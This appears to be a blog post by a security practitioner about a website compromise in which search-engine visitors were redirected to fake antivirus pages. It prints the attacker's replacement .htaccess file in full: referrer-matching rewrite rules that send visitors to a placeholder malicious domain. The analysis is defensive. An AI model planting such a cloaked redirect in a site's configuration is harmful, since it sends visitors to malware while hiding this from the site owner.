A couple months ago I was working with a customer who whenever you attempt to go to their website via google or yahoo, you were redirected to this famous Anti-virusxp 2008 software. After playing around a bit in my proxy, I was able to determine that this was a "Referrer" specific problem. If you traveled to the website via address bar, you were fine, however if your referrer attribute was set to a major search engine domain such at google, aol, ask, or yahoo, you were automatically redirected to a malicious page.
After alerting the customer of this issue, I asked him if he could please keep me informed of what was causing this. I contacted him two days later only to hear that his hosting company has taken care of the issue and he has zero details for me regarding the compromise.
For some reason, I really liked this type of compromise. For the most part the website owner could be completely uneducated that this is occurring for months. This to me, is a compromise that does not take full advantage, but somewhat leeches off of you like a tape worm.
I wanted to see this issue again. So what I did was plug this into our product to attempt to detect any site that was currently redirecting only if the referrer a site like google or yahoo. A month went by before I was able to see this again.
I was able to pick up on another Search Engine 302 redirect issue on the day that it was exploited. Our product detected and and i verified that it was valid. I was able to contact the customer and provide him with details about the issue and he was willing to work with me on determining how this was occurring.
Although I did not believe that this was occurring via SQL injection or via any GET/POST request, I still requested the entire week of log files. In reviewing these log files, I did see a couple of RFI attempts but nothing that looked successful or from review of the .txt page that the RFI was calling, I did not see anything that would lead to a compromise.
I was able to track down the problem and saw that the .htaccess file was replaced and contained the following.
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://maliciousdomain.com [R,L]
So with the review on the website, I am starting to point myself in the direction that there is an issue with the file permissions on the webserver.
This site was hosted through a large Hosting Provider in which I have already had previous issues with.
I had a Compromised Account come to me with an IFrame embedded on their website and all of the images deleted from the webserver. When looking up the iframe on google. I saw 20 different domains with the same iframe all hosted by by the same hosting provider. We came to the conclusion that there was probably some serious permission issues on the webserver. I had the customer move to a different hosting environment and they have not experienced a compromise since. I am guessing that this site might be experiencing the same type of problem.
If you have any more information to this issue, I would love to know about it. I really enjoy working with these types of compromise because they are few and far between and to me, seem well though out in design.
4 weeks ago
Posts
0 comments:
Post a Comment